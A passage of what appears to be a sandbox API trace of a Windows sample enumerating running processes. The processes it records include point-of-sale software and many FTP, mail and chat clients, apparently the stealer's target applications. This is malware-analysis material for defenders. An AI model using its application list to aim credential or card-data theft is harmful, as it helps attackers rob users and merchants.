th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0288.664] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0288.666] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0288.784] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0288.796] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0288.800] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0288.803] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0288.809] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0288.812] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0288.815] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0288.818] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0288.821] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0288.888] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0288.891] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0288.894] CloseHandle (hObject=0x21f8) returned 1 [0288.894] Sleep (dwMilliseconds=0x64) [0289.000] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0289.017] Process32First (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.019] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0289.021] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0289.023] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.026] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0289.031] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.033] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0289.036] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0289.038] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0289.040] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.093] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.096] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0289.099] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.101] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.103] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.109] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.111] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.113] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.115] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.117] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0289.119] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0289.124] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0289.126] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.128] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0289.130] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0289.132] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0289.134] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0289.218] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0289.220] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.221] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0289.223] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0289.224] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0289.226] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0289.227] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0289.229] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0289.233] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0289.236] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0289.237] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0289.239] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0289.240] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0289.242] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0289.243] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0289.281] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0289.284] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0289.286] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0289.288] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0289.290] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0289.306] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0289.308] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0289.310] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0289.311] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0289.313] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0289.314] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0289.316] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0289.318] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0289.319] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0289.321] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0289.322] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0289.326] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0289.328] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0289.330] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0289.331] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0289.333] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0289.334] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0289.336] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0289.338] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0289.344] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0289.347] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0289.349] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0289.351] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0289.353] Process32Next (in: hSnapshot=0x224c, 